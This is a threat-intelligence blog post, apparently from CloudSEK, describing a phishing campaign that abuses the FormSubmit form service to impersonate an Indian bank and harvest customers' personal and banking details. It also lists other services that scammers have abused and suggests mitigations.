Scammers Misuse FormSubmit SaaS Platform to Steal PII of Indian Banking Customers

December 14, 2022
4
min read

Category:

Adversary Intelligence

Industry:

Banking and Finance

Motivation:

Financial

Region:

Asia & Pacific

Executive Summary

THREAT IMPACT MITIGATION
  • Scammers use a free form service provider with no code integration to forward victims’ PII information to a verified email.
  • Using this scammers can steal banking credentials and PII.
  • Stolen PII details can be used to fuel various social engineering campaigns
  • Victims can be exploited financially.
  • Use XVigil to actively track events and take the necessary actions.
  • Educate customers about such fraudulent activities through various social media posts.

Analysis and Attribution

  • CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
  • FormSubmit is a no-code form service, designed to send input data from an HTML form straight to a specified email address.
  • This campaign was uncovered while analyzing a suspect domain which was classified as a threat by XVigil on 10 November 2022.

Information from the Fake Domain

  • The following information was gathered from the WHOIS records:
    • Creation Date: 08 November 2022
    • Updation Date: 08 November 2022
    • Domain Registrar: GoDaddy

Using FormSubmit to Create a Phishing Page

FormSubmit requires no integration but a designed form for a website and it can be set up within 3 steps:

  1. Connecting  form in the hosted website
  2. Include attributes in all form elements (like <input>, <select> and <textarea>) to receive the submission data
  3. First-time submission of the form requires a user to confirm the specified email address.
Screenshot of the website of FormSubmit
Screenshot of the website of FormSubmit

Similar Phishing Campaigns

  • Scammers are rapidly adopting newer technologies and abusing services/features provided by various SaaS platforms.
  • In 2022, CloudSEK observed a new trend of abusing domain forwarding services(mostly freemium) offered by web hosting providers to host phishing pages.
  • These campaigns are usually targeted at Indian banking customers.
  • Previously the following services were abused by threat actors for their campaigns:
  • Reverse tunneling services  offered by ngrok, TryCloudflare, LocalHostRun and more.
  • Cloudflare Pages
  • Hostinger’s Preview Domain
  • A2 Hosting’s Services

References

Appendix

Screenshot of the phishing website used by scammers to steal customers’ PII details
Screenshot of the phishing website used by scammers to steal customers’ PII details

 

 

Tags:
No items found.